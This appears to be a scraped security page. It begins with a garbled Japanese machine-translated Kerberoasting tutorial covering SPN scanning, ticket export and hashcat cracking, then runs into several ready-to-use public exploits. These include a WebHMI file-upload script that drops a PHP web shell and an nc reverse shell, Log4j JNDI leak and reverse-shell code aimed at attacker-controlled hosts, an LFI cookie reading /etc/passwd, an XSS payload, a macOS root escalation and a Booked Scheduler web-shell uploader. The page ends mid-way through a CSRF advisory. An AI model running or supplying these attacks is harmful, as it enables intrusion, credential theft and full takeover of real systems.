HireHackking

0x01 SPN定義 サービスプリンシパル名（SPN）は、特定のKerberosターゲットコンピューターを独自に識別するためにKerberosクライアントが使用するサービスインスタンス名です。 Kerberos AuthenticationはSPNを使用して、サービスインスタンスをサービスログインアカウントに関連付けます。森林全体のコンピューターに複数のサービスインスタンスがインストールされている場合、各インスタンスには独自のSPNが必要です。クライアントが複数の名前で認証できる場合、特定のサービスインスタンスには複数のSPNを持つことができます。たとえば、SPNには常にサービスインスタンスを実行するホスト名が含まれているため、サービスインスタンスはホストの各名前またはエイリアスのSPNを登録できます。 0x02 SPNスキャン SNスキャンは、Kerberosサービスインスタンス名をスキャンすることもできます。アクティブなディレクトリ環境でサービスを発見する最良の方法は、「SPNスキャン」を使用することです。特定のSPNタイプのサービスプリンシパル名を要求してサービスを見つけることにより、ネットワークポートスキャンを介したSPNスキャン攻撃者の主な利点は、SPNスキャンでは、ネットワークに接続された各IPがサービスポートを確認する必要がないことです。 SPNスキャンは、LDAPクエリを介してドメインコントローラーにサービスの発見を実行します。 SPNクエリは通常のKerberosチケットの一部であるため、クエリを使用できない場合は、ネットワークポートスキャンで確認できます。 1.SPNフォーマット spn=serviceclass "/" hostname [":" port] ["/" serviceName] ServiceClass=MSSQL servicename=sql.bk.com で： ServiceClass: Webサービスのwwwなどのサービスクラスの文字列を識別します HOSTNAME:文字列はシステムの名前です。これは、完全に適格なドメイン名（FQDN）である必要があります。 PORT:番号はサービスのポート番号です。 ServicEname:サービスの著名な名前（DN）、ObjectGuid、インターネットホスト名、または完全に適格なドメイン名（FQDN）である文字列。 注:サービスクラスとホストが必要なパラメーターですが、ポートとサービス名はオプションです。ホストとポートの間のコロンは、ポートが存在する場合にのみ必要です。 2。一般的なサービスとSPNサービスインスタンス名 mssqlsvc/adsmssqlap01.adsecurity.org:1433 交換 Exchangemdb/adsmsexcas01.adsecurity.org RDP The Termerv/adsmsexcas01.adsecurity.org WSMAN/WINRM/PSリモート wsman/adsmsexcas01.adsecurity.org Hyper-Vホスト Microsoft Virtual Console Service/adsmshv01.adsecurity.org vmware vcenter sts/adsmsvc01.adsecurity.org 2。 SPNスキャンPSスクリプト MSSQLサービスでSPNサービスインスタンスの名前を発見してください。 https://github.com/pyrotek3/powershell-ad-recon/blob/master/discover-psmssqlservers 他のSPNサービスインスタンス名クエリ： https://github.com/pyrotek3/powershell-ad-recon 各サーバーはKerberos認証サービスにSPNを登録する必要があるため、これはポートスキャンを実行せずに環境に関する情報を収集するのに最適な方法を提供します。 例えば： 管理者は、「MetCorpKCS17」という名前のサーバーにMicrosoft SQL Serverをインストールおよび構成し、ポート3170 3および3171に耳を傾けるSQLインスタンスを使用します。 その後、サービスクラスとインスタンス名は次のように生成されます。 MSSQLSVC/METCORPKCS17.ADSECURITY.org:3170MSSQLSVC/METCORPKCS17.ADSECURITY.org:3171 青い部分はサービスクラス、オレンジ色の部分はコンピューターのFQDN、緑の部分はネットワークポート番号です。KerberosはSPN要求がディレクトリの既存のSPNに一致するため、最後の番号は必ずしもサーバー上のポートではありません。上記のように、ほとんどの場合、SPNに記録されたポートはサーバー上のリスニングポートであり、すべてのSPNがポートを含むわけではありません。これで、Active DirectoryドメインまたはフォレストでSQLサーバーを発見するためのより良い方法があります。ServicePrincipalName=MSSQL* 0x03 SPNスキャンとクラッキングTGSチケットはMSSQLサービスを使用してSPNを例として構成します 参照構成アドレス： https://technet.microsoft.com/zh-cn/library/bb735885.aspx 1。SQLの場合 サーバーサービスアカウント登録SPN 手動登録： setSpn -a mssqlsvc/myhost.redmond.microsoft.com:1433 accountname 対応する名前のインスタンス： setSpn -a mssqlsvc/myhost.redmond.microsoft.com/instancename accountname 2。ユーザーに対応するSPNを確認します。 setspn -l ruos \ sql -service 3. ADSI（ADSIEDIT.MSC）を使用して、ユーザー属性を表示します 4.広告のユーザーにサービスログイン権限を指定します。 gpo_name \ computer Configuration \ Windows Settings \ Security Settings \ Local Policies \ User Rights 割り当て サービスとしてログオンします 5 .変更 SQL Server Serviceアカウントはドメインユーザーアカウントです 6。ブルートフォースケルベロス TGSチケット 暗号化タイプはRC4_HMAC_MD5であるため、Kerberos Protocol TGS-REPの4番目のステップは、サービスアカウントのNTLMパスワードで暗号化されたチケットを返します。 7.SPNスキャン setspn -t ドメイン-Q */* または https://github.com/pyrotek3/powershell-ad-recon/ 8。spnをリクエストします Kerberosのチケット PS C: \ Add -Type -Assemblyname System.IdentityModel PS C: \ new-Object System.IdentityModel.tokens.kerberosRequestorseCurityToken -argumentlist 'mssqlsvc/webtst01.ruos.org/sqlexpress' 9。チケットを表示およびエクスポートします デフォルトの構成暗号化タイプはAES256_HMACであり、TGSREPCRACKをクラックできません。サーバーグループポリシーで暗号化タイプをRC4_HMAC_MD5として指定できます。 gpo_name \ computer configuration \ windows settings \ security settings \ local ポリシー\セキュリティオプション Network Security: Kerberosに許可される暗号化タイプを構成します 10。オフラインのひび割れ TGSREPACK（RC4_HMAC_MD5のみ）、またはハッシュカットを使用してハッシュを保存してクラックします。 ハッシュをエクスポートする（他の暗号化タイプ用） getUserSpns.py -Request -OutputFile hash.txt -dc-ip 192.168.6.2 ruos.org/user2 または、請求書からkirbi2john.pyをエクスポートします 1-40A00000-USER2@MSSQLSVC~webtst01.ruos.org~sqlexpress-ruos.org.kirbi S2。 hashcat64.exe -m 13100 hash.txt emple.dict –force 次のように他のひび割れツールを参照することもできます。 https://github.com/nidem/kerberoast https://github.com/coresecurity/impacket https://github.com/nidem/kerberoast/blob/master/kirbi2john.py 0x04 Active Directoryサービスの包括的な参照テーブルプリンシパル名（SPN）Acronisagent：Acronisバックアップおよびデータ回復ソフトウェア用 Adtserver：ACSを備えたMicrosoftシステム センターオペレーションマネージャー（2007/2012）管理サーバー Afpserver：Appleアーカイブプロトコル AGPMSERVER：Microsoft Advanced Group Policy Management（AGPM） aradminsvc-タスクマスターロールサーバー ARSSVC-タスクマスターロールサーバー BOCMS：コマーシャルCMS BOSSO：ビジネスオブジェクト CESREMOTE：VMware上のCitrix VDIソリューションに関連して、多くのVDIワークステーションにはこのSPNがあります。 CIFS：ユニバーサルインターネットファイルシステム CMRCService：Microsoft System Center Configuration Manager（SCCM）リモートコントロール CusessionKeysVr：Cisco Unity VoIPシステム CVS：CVSライブラリ DFSR *：分散ファイルシステム DNS：ドメイン名サーバー E3514235-4B06-11D1-AB04-00C04FC2DCD2：NTDS DC RPCコピー E3514235-4B06-11D1-AB04-00C04FC2DCD2-ADAM：Adam Instance EDVR：ExacqVision Service ExchAngeAB：アドレス帳サービスを交換（通常はNSPI、通常はすべてのGCをサポートするドメインコントローラー） ExchangemDB：RPCクライアントアクセスサーバーの役割 Exchangerfr：アドレス帳サービスを交換します FCSVR：Apple Final Cut Server filerepservice：wsfilerepservice.exe FimService：Microsoft 最前線の識別マネージャー（FIM） FTP：ファイル転送プロトコル GC：ドメインコントローラーグローバルカタログサービス HDFS：Hadoop（Ambari） ホスト：ホストサービスはホストを表します。ホストSPNは、サービスチケットの作成時にKerberosプロトコルによって長期キーを使用するホストアカウントにアクセスするために使用されます。 HTTP：Kerberos認証をサポートするHTTPネットワークサービスのSPN Hyper-Vレプリカサービス：Microsoft Hyper-Vレプリカサービス IMAP：インターネットメッセージアクセスプロトコル IMAP4：インターネットメッセージアクセスプロトコルバージョン4 IPP：インターネット印刷プロトコル ISCSITARGET：ISCSI構成 Kadmin：Kerberos LDAP：ドメインコントローラーやAdamインスタンスなどのLDAPサービス。 MAGFS：Maginatics Magfs MapRed：Cloudera Microsoft Virtual Consoleサービス：HyperVホスト Microsoft Virtual System Migration Service：P2Vサポート（Hyper-V） Mongod：Mongodb Enterprise Mongos：Mongodb Enterprise MSClusterVirtualServer：Windowsクラスターサーバー MSOLAPSVC：SQL Server Analysis Service MSOLAPSVC.3：SQL Server Analysis Service MSOLAPDISCO.3：SQL Server Analysis Service MSOMHSVC：Microsoft System Center Operations Manager（2007/2012）管理サーバー MSOMSDKSVC：Microsoft System センターオペレーションマネージャー（2007/2012）管理サーバー MSSERVERCLUSTER：Windowsクラスターサーバー MSSERVERCLUSTERMGMTAPI：このクラスターAPIでは、このSPNにKerberosを使用してサーバーに認証する必要があります MSSQL：Microsoft SQL サーバ MSSQLSVC：Microsoft SQL サーバ MSSQL $ ADOBECONNECT：Adobe ConnectをサポートするMicrosoft SQL Server MSSQL $ BIZTALK：Microsoft SQL サーバーはMicrosoftをサポートします biztalkサーバー MSSQL $ BusinessObjects：ビジネスオブジェクトをサポートするMicrosoft SQL Server MSSQL $ DB01NETIQ：NETIQをサポートするMicrosoft SQL サーバ NFS：ネットワークファイルシステム Nppolicyevaluator：Dell Quest監査人 Nprepository 4（Changeauditor）：Dell Quest Change 監査人 NPREPOSITORY4（CAAD）：Dell Quest監査人 NPREPOSITORY4（デフォルト）：Dell Task Auditor NTFRS *：NTファイルコピーサービス Oracle：Oracle Kerberos認証 Pcast：Apple Podcastプロデューサー PCNSCLNT：自動パスワード同期ソリューション（MIIS 2003＆FIM） ポップ：電子メール契約 POP3：電子メール契約バージョン3 PVSSOAP：Citrix プロビジョニングサービス（7.1） 制限付きkrbhost：サービスクラスの文字列が「restrictedkrbhost」に等しいSPNを使用するサービスクラス。サービスバウチャーはコンピューターアカウントキーを使用してセッションキーを共有します。 RPC：リモートプロシージャコールサービス SAP：SAP/SAPSERVICE シド SAS：SASサーバー SCVMM：システムセンター仮想マシンマネージャー Secshd：IBM Infosphere SIP：セッションスタートアッププロトコル SMTP：単純なメール転送プロトコル SMTPSVC：単純なメール転送プロトコル SoftGrid：Microsoftアプリケーション仮想化（APP-V）以前は「SoftGrid」 STS：VMware SSOサービス SQLAGENT $ DB01NETIQ：SQL Service for Netiq Tapenego：Microsoftファイアウォール（ISA、TMGなど）などのルーティングアプリケーションに関連付けられています。 The ThersRV：Microsoftリモートデスクトッププロトコルサービス、ターミナルサービスとしても知られています。 TNETD：Juniper Kerberos認証 「TNETDは、ルーティングエンジンやパケット転送エンジンなどのさまざまなコンポーネント間の内部通信に使用されるデーモンです」 VMRC：Microsoft Virtual Server 2005 VNC：VNCサーバー VPN：仮想プライベートネットワーク VPRORECOVERY BACKUP Exec System Recovery Agent 7.0 VPRORECOVERY BACKUP Exec System Recovery Agent 8.0 VPRORECOVERYバックアップEXECシステム回復エージェント9.0 vProrecovery Norton Clone Proxy 12.0 vprorecoverynorton クローンプロキシ14.0VPRORECOVERY NORTON CLONE Proxy 15.0 VProRecovery Symantec System Recovery Agent 10.0 VProRecovery Symantec System Recovery Agent 11.0 VProRecovery Symantec System Recovery Agent 14.0 vssrvc: Microsoft Virtual Server (2005) WSMAN：Windowsリモート管理（WS管理標準に基づく）サービス XMPP/XMPP：拡張可能なメッセージとレンダリングプロトコル（Jabber） Xgrid：Appleの分散（グリッド）計算/ Mac OS X 10.6サーバー管理 糸：クルダラ MapReduce 注：ドメインコントローラーは、パブリックSPNをホストSPNに自動的にマッピングします。コンピューターがドメインに結合されると、ホストSPNはすべてのコンピューターアカウントのServicePrincipalNameプロパティに自動的に追加されます。ドメインコントローラーSPNマッピングは、SPNMAppingsのプロパティによって制御されます。 「CN=ディレクトリ サービス、cn=windowsnt、cn=services、cn=configuration SPNは自動的にホスト（SPNMAPPING属性値）:Alerterにマッピングされます appmgmt CISVC Clipsrv ブラウザ DHCP dnscache レプリケーター eventlog Eventsystem 政策立案者 オークリー dmserver DNS MCSVC ファックス msserver IAS メッセンジャー Netlogon ネットマン netdde netddedsm nmagent プラグプレイ ProtectedStorage ラスマン rpclocator RPC RPCSS RemoteaCcess お返事お願いします samss scandsvr SSRV Seclogon SCM DCOM CIF スプーラ SNMP スケジュール tapisrv trksvr trkwks UPS 時間 勝ちます www http W3SVC iisadmin MSDTC

# Exploit Title: WebHMI 4.0 - Remote Code Execution (RCE) (Authenticated) # Date: 12/12/2021 # Exploit Author: Jeremiasz Pluta # Vendor Homepage: https://webhmi.com.ua/en/ # Version: WebHMI Firmware < 4.1 # CVE: CVE-2021-43936 # Tested on: WebHMI Firmware 4.0.7475 #!/usr/bin/python import sys import re import argparse import pyfiglet import requests import time import subprocess banner = pyfiglet.figlet_format("CVE-2021-43936") print(banner) print('Exploit for CVE-2021-43936') print('For: WebHMI Firmware < 4.1') login = "admin" #CHANGE ME IF NEEDED password = "admin" #CHANGE ME IF NEEDED class Exploit: def __init__(self, target_ip, target_port, localhost, localport): self.target_ip = target_ip self.target_port = target_port self.localhost = localhost self.localport = localport def exploitation(self): payload = """<?php system($_GET['cmd']); ?>""" payload2 = """rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+""" + localhost + """+""" + localport + """+>/tmp/f""" headers_login = { 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', 'Accept': 'application/json, text/javascript, */*; q=0.01', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/json', 'X-WH-LOGIN': login, 'X-WH-PASSWORD': password, 'X-Requested-With': 'XMLHttpRequest', 'Connection': 'close', 'Content-Length': '0' } url = 'http://' + target_ip + ':' + target_port r = requests.Session() print('[*] Resolving URL...') r1 = r.get(url) time.sleep(3) print('[*] Trying to log in...') r2 = r.post(url + '/api/signin', headers=headers_login, allow_redirects=True) time.sleep(3) print('[*] Login redirection...') login_cookies = { 'X-WH-SESSION-ID':r2.headers['X-WH-SESSION-ID'], 'X-WH-CHECK-TRIAL':'true', 'il18next':'en', } r3 = r.post(url + '/login.php?sid=' + r2.headers['X-WH-SESSION-ID'] + '&uid=1',cookies=login_cookies) time.sleep(3) print('[*] Uploading cmd.php file...') files = { 'file': ('cmd.php', payload, 'application/x-php') } r4 = r.post(url + '/files.php', files=files, cookies=login_cookies) time.sleep(3) print('[*] Setting up netcat listener...') listener = subprocess.Popen(["nc", "-nvlp", self.localport]) time.sleep(3) print('[*] Executing reverse shell...') print('[*] Watchout for shell! :)') r5 = r.get(url + '/uploads/files/cmd.php?cmd=' + payload2, cookies=login_cookies) if (r5.status_code == 200): print('[*] Got shell!') while True: listener.wait() else: print('[-] Something went wrong!') listener.terminate() def get_args(): parser = argparse.ArgumentParser(description='WebHMI Firmware <4.1 Unrestricted File Upload + Code Execution (Authenticated)') parser.add_argument('-t', '--target', dest="url", required=True, action='store', help='Target IP') parser.add_argument('-p', '--port', dest="target_port", required=True, action='store', help='Target port') parser.add_argument('-L', '--listener-ip', dest="localhost", required=True, action='store', help='Local listening IP') parser.add_argument('-P', '--localport', dest="localport", required=True, action='store', help='Local listening port') args = parser.parse_args() return args args = get_args() target_ip = args.url target_port = args.target_port localhost = args.localhost localport = args.localport exp = Exploit(target_ip, target_port, localhost, localport) exp.exploitation()

# Exploit Title: HD-Network Real-time Monitoring System 2.0 - Local File Inclusion (LFI) # Google Dork: intitle:"HD-Network Real-time Monitoring System V2.0" # Date: 11/12/2021 # Exploit Author: Momen Eldawakhly (Cyber Guy) # Vendor Homepage: N/A # Version: V2.0 # Tested on: Nginx NVRDVRIPC Web Server Proof of Concept: GET /language/lang HTTP/1.1 Referer: http://example.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36 Cookie: s_asptitle=HD-Network%20Real-time%20Monitoring%20System%20V2.0; s_Language=../../../../../../../../../../../../../../etc/passwd; s_browsertype=2; s_ip=; s_port=; s_channum=; s_loginhandle=; s_httpport=; s_sn=; s_type=; s_devtype= Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,br Host: VulnIP Connection: Keep-alive

# Exploit Title: Apache Log4j2 2.14.1 - Information Disclosure # Date: 12/12/2021 # Exploit Author: leonjza # Vendor Homepage: https://logging.apache.org/log4j/2.x/ # Version: <= 2.14.1 # CVE: CVE-2021-44228 #!/usr/bin/env python3 # Pure python ENV variable leak PoC for CVE-2021-44228 # Original PoC: https://twitter.com/Black2Fan/status/1470281005038817284 # # 2021 @leonjza import argparse import socketserver import threading import time import requests LDAP_HEADER = b'\x30\x0c\x02\x01\x01\x61\x07\x0a\x01\x00\x04\x00\x04\x00\x0a' class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler): def handle(self) -> None: print(f' i| new connection from {self.client_address[0]}') sock = self.request sock.recv(1024) sock.sendall(LDAP_HEADER) data = sock.recv(1024) data = data[9:] # strip header # example response # # ('Java version 11.0.13\n' # '\x01\x00\n' # '\x01\x03\x02\x01\x00\x02\x01\x00\x01\x01\x00\x0b' # 'objectClass0\x00\x1b0\x19\x04\x172.16.840.1.113730.3.4.2') data = data.decode(errors='ignore').split('\n')[0] print(f' v| extracted value: {data}') class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer): pass def main(): parser = argparse.ArgumentParser(description='a simple log4j <=2.14 information disclosure poc ' '(ref: https://twitter.com/Black2Fan/status/1470281005038817284)') parser.add_argument('--target', '-t', required=True, help='target uri') parser.add_argument('--listen-host', default='0.0.0.0', help='exploit server host to listen on (default: 127.0.0.1)') parser.add_argument('--listen-port', '-lp', default=8888, help='exploit server port to listen on (default: 8888)') parser.add_argument('--exploit-host', '-eh', required=True, default='127.0.0.1', help='host where (this) exploit server is reachable') parser.add_argument('--leak', '-l', default='${java:version}', help='value to leak. ' 'see: https://twitter.com/Rayhan0x01/status/1469571563674505217 ' '(default: ${java:version})') args = parser.parse_args() print(f' i| starting server on {args.listen_host}:{args.listen_port}') server = ThreadedTCPServer((args.listen_host, args.listen_port), ThreadedTCPRequestHandler) serv_thread = threading.Thread(target=server.serve_forever) serv_thread.daemon = True serv_thread.start() time.sleep(1) print(f' i| server started') payload = f'${{jndi:ldap://{args.exploit_host}:{args.listen_port}/{args.leak}}}' print(f' i| sending exploit payload {payload} to {args.target}') try: r = requests.get(args.target, headers={'User-Agent': payload}) print(f' i| response status code: {r.status_code}') print(f' i| response: {r.text}') except Exception as e: print(f' e| failed to make request: {e}') finally: server.shutdown() server.server_close() if __name__ == '__main__': main()

# Exploit Title: WordPress Plugin Typebot 1.4.3 - Stored Cross Site Scripting (XSS) (Authenticated) # Date: 29/11/2021 # Exploit Author: Mansi Singh # Vendor Homepage: https://wordpress.org/plugins/typebot/ # Software Link: https://wordpress.org/plugins/typebot/ # Tested on Windows # Reference: https://wpscan.com/vulnerability/2bde2030-2dfe-4dd3-afc1-36f7031a91ea How to reproduce vulnerability: 1. Install Latest WordPress 2. Install and activate Typebot Version 1.4.3 3. Navigate to Typebot setting >> enter the payload into 'Publish ID or Full URL'. 4. Enter JavaScript payload which is mentioned below "><img src=x onerror=confirm(1)> 5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload gets executed successfully and we'll get a pop-up.

# Exploit Title: Apache Log4j 2 - Remote Code Execution (RCE) # Date: 11/12/2021 # Exploit Authors: kozmer, z9fr, svmorris # Vendor Homepage: https://logging.apache.org/log4j/2.x/ # Software Link: https://github.com/apache/logging-log4j2 # Version: versions 2.0-beta-9 and 2.14.1. # Tested on: Linux # CVE: CVE-2021-44228 # Github repo: https://github.com/kozmer/log4j-shell-poc import subprocess import sys import argparse from colorama import Fore, init import subprocess import threading from http.server import HTTPServer, SimpleHTTPRequestHandler init(autoreset=True) def listToString(s): str1 = "" try: for ele in s: str1 += ele return str1 except Exception as ex: parser.print_help() sys.exit() def payload(userip , webport , lport): genExploit = ( """ import java.io.IOException; import java.io.InputStream; import java.io.OutputStream; import java.net.Socket; public class Exploit { public Exploit() throws Exception { String host="%s"; int port=%s; String cmd="/bin/sh"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start(); Socket s=new Socket(host,port); InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream(); OutputStream po=p.getOutputStream(),so=s.getOutputStream(); while(!s.isClosed()) { while(pi.available()>0) so.write(pi.read()); while(pe.available()>0) so.write(pe.read()); while(si.available()>0) po.write(si.read()); so.flush(); po.flush(); Thread.sleep(50); try { p.exitValue(); break; } catch (Exception e){ } }; p.destroy(); s.close(); } } """) % (userip, lport) # writing the exploit to Exploit.java file try: f = open("Exploit.java", "w") f.write(genExploit) f.close() print(Fore.GREEN + '[+] Exploit java class created success') except Exception as e: print(Fore.RED + f'[-] Something went wrong {e.toString()}') checkJavaAvailible() print(Fore.GREEN + '[+] Setting up fake LDAP server\n') # create the LDAP server on new thread t1 = threading.Thread(target=createLdapServer, args=(userip,webport)) t1.start() # start the web server httpd = HTTPServer(('localhost', int(webport)), SimpleHTTPRequestHandler) httpd.serve_forever() def checkJavaAvailible(): javaver = subprocess.call(['./jdk1.8.0_20/bin/java', '-version'], stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL) if(javaver != 0): print(Fore.RED + '[-] Java is not installed inside the repository ') sys.exit() def createLdapServer(userip, lport): sendme = ("${jndi:ldap://%s:1389/a}") % (userip) print(Fore.GREEN +"[+] Send me: "+sendme+"\n") subprocess.run(["./jdk1.8.0_20/bin/javac", "Exploit.java"]) url = " http://{}:{}/#Exploit".format (userip, lport) subprocess.run(["./jdk1.8.0_20/bin/java", "-cp", "target/marshalsec-0.0.3-SNAPSHOT-all.jar", "marshalsec.jndi.LDAPRefServer", url]) def header(): print(Fore.BLUE+""" [!] CVE: CVE-2021-44228 [!] Github repo: https://github.com/kozmer/log4j-shell-poc """) if __name__ == "__main__": header() try: parser = argparse.ArgumentParser(description='please enter the values ') parser.add_argument('--userip', metavar='userip', type=str, nargs='+', help='Enter IP for LDAPRefServer & Shell') parser.add_argument('--webport', metavar='webport', type=str, nargs='+', help='listener port for HTTP port') parser.add_argument('--lport', metavar='lport', type=str, nargs='+', help='Netcat Port') args = parser.parse_args() #print(args.userip) payload(listToString(args.userip), listToString(args.webport), listToString(args.lport)) except KeyboardInterrupt: print(Fore.RED + "user interupted the program.") sys.exit(0)

# Exploit Title: Laravel Valet 2.0.3 - Local Privilege Escalation (macOS) # Exploit Author: leonjza # Vendor Homepage: https://laravel.com/docs/8.x/valet # Version: v1.1.4 to v2.0.3 #!/usr/bin/env python2 # Laravel Valet v1.1.4 - 2.0.3 Local Privilege Escalation (macOS) # February 2017 - @leonjza # Affected versions: At least since ~v1.1.4 to v2.0.3. Yikes. # Reintroduced in v2.0.7 via the 'trust' command again. # This bug got introduced when the sudoers files got added around # commit b22c60dacab55ffe2dc4585bc88cd58623ec1f40 [1]. # Effectively, when the valet command is installed, composer will symlink [2] # the `valet` command to /usr/local/bin. This 'command' is writable by the user # that installed it. # # ~ $ ls -lah $(which valet) # lrwxr-xr-x 1 leonjza admin 51B Feb 25 00:09 /usr/local/bin/valet -> /Users/leonjza/.composer/vendor/laravel/valet/valet # Running `valet install`, will start the install [3] routine. The very first action # taken is to stop nginx (quietly?) [4], but runs the command with `sudo` which # will prompt the user for the sudo password in the command line. From here (and in fact # from any point where the valet tool uses sudo) the command can execute further commands # as root without any further interaction needed by the user. # With this 'sudo' access, the installer does it thing, and eventually installs two new # sudoers rules for homebrew[5] and valet[6]. # ~ $ cat /etc/sudoers.d/* # Cmnd_Alias BREW = /usr/local/bin/brew * # %admin ALL=(root) NOPASSWD: BREW # Cmnd_Alias VALET = /usr/local/bin/valet * # %admin ALL=(root) NOPASSWD: VALET # The problem with the sudoers rules now is the fact that a user controlled script # (rememeber the valet command is writable to my user?) is allowed to be run with # root privileges. More conveniently, without a password. So, to trivially privesc # using this flaw, simply edit the `valet` command and drop `/bin/bash` in there. :D # Or, use this lame script you lazy sod. # # ~ $ sudo -k # ~ $ python escalate.py # * Shell written. Dropping into root shell # bash-3.2# whoami # root # bash-3.2# exit # exit # * Cleaning up POC from valet command # [1] https://github.com/laravel/valet/commit/b22c60dacab55ffe2dc4585bc88cd58623ec1f40 # [2] https://github.com/laravel/valet/blob/v2.0.3/composer.json#L39 # [3] https://github.com/laravel/valet/blob/v2.0.3/cli/valet.php#L37-L50 # [4] https://github.com/laravel/valet/blob/v2.0.3/cli/Valet/Nginx.php#L133 # [5] https://github.com/laravel/valet/blob/v2.0.3/cli/Valet/Brew.php#L171-L177 # [6] https://github.com/laravel/valet/blob/v2.0.3/cli/Valet/Valet.php#L40-L46 import os import subprocess MIN_VERSION = "1.1.4" MAX_VERSION = "2.0.3" POC = "/bin/bash; exit;\n" def run_shit_get_output(shit_to_run): return subprocess.Popen(shit_to_run, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE) def version_tuple(v): return tuple(map(int, (v.split(".")))) def get_valet(): p = run_shit_get_output('which valet') lines = ''.join(p.stdout.readlines()) if 'bin/valet' in lines: return lines.strip() return None def get_valet_version(valet_location): p = run_shit_get_output(valet_location) v = p.stdout.read(25) return v.split("\n")[0].split(" ")[2] def can_write_to_valet(valet_location): return os.access(valet_location, os.W_OK) def cleanup_poc_from_command(command_location): with open(command_location, 'r') as vc: command_contents = vc.readlines() if command_contents[1] == POC: print('* Cleaning up POC from valet command') command_contents.pop(1) with open(command_location, 'w') as vc: vc.write(''.join(command_contents)) return print('* Could not cleanup the valet command. Check it out manually!') return def main(): valet_command = get_valet() if not valet_command: print(' * The valet command could not be found. Bailing!') return # get the content so we can check if we already pwnd it with open(valet_command, 'r') as vc: command_contents = vc.readlines() # check that we havent already popped this thing if command_contents[1] == POC: print('* Looks like you already pwnd this. Dropping into shell anyways.') os.system('sudo ' + valet_command) cleanup_poc_from_command(valet_command) return current_version = get_valet_version(valet_command) # ensure we have a valid, exploitable version if not (version_tuple(current_version) >= version_tuple(MIN_VERSION)) \ or not (version_tuple(current_version) <= version_tuple(MAX_VERSION)): print(' * Valet version {0} does not have this bug!'.format(current_version)) return # check that we can write if not can_write_to_valet(valet_command): print('* Cant write to valet command at {0}. Bailing!'.format(valet_command)) return # drop the poc line and write the new one command_contents.insert(1, POC) with open(valet_command, 'w') as vc: vc.write(''.join(command_contents)) print('* Shell written. Dropping into root shell') # drop in the root shell :D os.system('sudo ' + valet_command) cleanup_poc_from_command(valet_command) if __name__ == '__main__': main()

# Exploit Title: Booked Scheduler 2.7.5 - Remote Command Execution (RCE) (Authenticated) # Vulnerability founder: AkkuS # Date: 13/12/2021 # Exploit Author: 0sunday # Vendor Homepage: https://www.bookedscheduler.com/ # Software Link: N/A # Version: Booked Scheduler 2.7.5 # Tester on: Kali 2021.2 # CVE: CVE-2019-9581 #!/usr/bin/python3 import sys import requests from random import randint def login(): login_payload = { "email": username, "password": password, "login": "submit", #"language": "en_us" } login_req = request.post( target+"/booked/Web/index.php", login_payload, verify=False, allow_redirects=True ) if login_req.status_code == 200: print ("[+] Logged in successfully.") else: print ("[-] Wrong credentials !") exit() return login_req.text.split('CSRF_TOKEN" value=')[1].split(";")[0].split('/')[0].split('"')[1] def upload_shell(csrf): boundary = str(randint(123456789012345678901234567890, 999999999999999999999999999999)) _headers ={ "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept-Language": "en-US,en;q=0.5", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------"+boundary, "Origin": target, "Connection": "close", "Referer": target + "/booked/Web/admin/manage_theme.php?update" } data = "-----------------------------"+boundary+"\r\n" data += "Content-Disposition: form-data; name=\"LOGO_FILE\"\r\n\n\n" data += "-----------------------------"+boundary+"\r\n" data += "Content-Disposition: form-data; name=\"FAVICON_FILE\"; filename=\"simple_shell.php\"\r\n" data += "Content-Type: application/x-php\r\n\n" data += "<?php $o = system($_REQUEST[\"cmd\"]);die?>\r\n\n" data += "-----------------------------"+boundary+"\r\n" data += "Content-Disposition: form-data; name=\"CSS_FILE\"\r\n\n\n" data += "-----------------------------"+boundary+"\r\n" data += "Content-Disposition: form-data; name=\"CSRF_TOKEN\"\r\n\n" data += csrf + "\r\n" data += "-----------------------------"+boundary+"--\r\n" # In case you need some debugging _proxies = { 'http': 'http://127.0.0.1:8080' } upload_req = request.post( target+"/booked/Web/admin/manage_theme.php?action=update", headers = _headers, data = data #proxies=_proxies ) def shell(): shell_req = request.get(target+"/booked/Web/custom-favicon.php") if shell_req.status_code == 200: print("[+] Uploaded shell successfully") print("[+] " + target + "/booked/Web/custom-favicon.php?cmd=") else: print("[-] Shell uploading failed") exit(1) print() cmd = '' while(cmd != 'exit'): cmd = input("$ ") shell_req = request.get(target+"/booked/Web/custom-favicon.php" + '?cmd='+cmd) print(shell_req.text) if len(sys.argv) != 4: print ("[+] Usage : "+ sys.argv[0] + " https://target:port username password") exit() target = sys.argv[1] username = sys.argv[2] password = sys.argv[3] request = requests.session() csrf = login() upload_shell(csrf) shell()

# Exploit Title: Zucchetti Axess CLOKI Access Control 1.64 - Cross Site Request Forgery (CSRF) # Date: 13/12/2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.axesstmc.com/cloki/ <!-- Zucchetti Axess CLOKI Access Control 1.64 CSRF Disable Access Control Vendor: Zucchetti Axess S.p.A. Product web page: https://www.axesstmc.com Affected version: 1.64 1.63 1.54 Summary: CLOKI is the pre-installed application on our terminals that provides simple to use access control management and attendance monitoring using any browser (IE, Chrome, Firefox, etc.). It is suited for anyone looking for a stand-alone Access Control and Attendance Monitoring system where the users' data is not frequently changed. Data management is simple and intuitive and no additional software is needed on the PC intend to use as WEB base. CLOKI for Access Control also allows configuration and monitoring of access at all company entrances (doors, gates, turnstiles etc). The Access Control manages any type of reader, entrance and access credential. Using an impartial selector it is possible to check that employees do not take company assets and allows registration of all accesses to the system and all operations that users carry out. Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. These actions can be exploited to perform authentication detriment and account password change with administrative privileges if a logged-in user visits a malicious web site. Tested on: Start 